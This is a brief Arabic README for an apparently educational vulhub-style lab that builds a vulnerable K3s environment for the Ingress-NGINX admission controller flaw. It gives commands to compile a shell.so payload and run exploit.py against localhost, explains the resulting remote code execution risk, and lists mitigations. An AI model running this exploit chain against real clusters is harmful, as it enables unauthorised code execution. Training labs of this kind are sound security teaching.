
مهمة تكوين بيئة Docker الافتراضية المعرّضة للثغرات (CVE) لفوج WHS3
الدفعة الثالثة من مدرسة القبعات البيضاء - [كيم سو-أون (@salt318)] (https://github.com/salt318/vulhub)
docker compose up -d لتشغيل بيئة الاختبار (بيئة Kubernetes مبنية على K3s)gcc -shared -fPIC -o shell.so shell.c
python exploit.py -a https://localhost:30443/networking/v1/ingresses -i http://localhost:30080/fake/addr -s shell.so

تتيح ثغرة غياب المصادقة في Ingress-NGINX Admission Controller إدراج موارد Ingress خبيثة أو التحكم في النظام، وقد تؤدي عند ربطها بثغرات أخرى إلى تنفيذ التعليمات البرمجية عن بُعد (RCE). لذلك، يجب تطبيق إجراءات أمنية مثل تعزيز مصادقة الوصول إلى Admission Controller والتحقق من الصلاحيات، وتقوية منطق التحقق من موارد Ingress، ومنع الوصول الخارجي عبر إعداد قوائم التحكم في الوصول (ACL) للشبكة.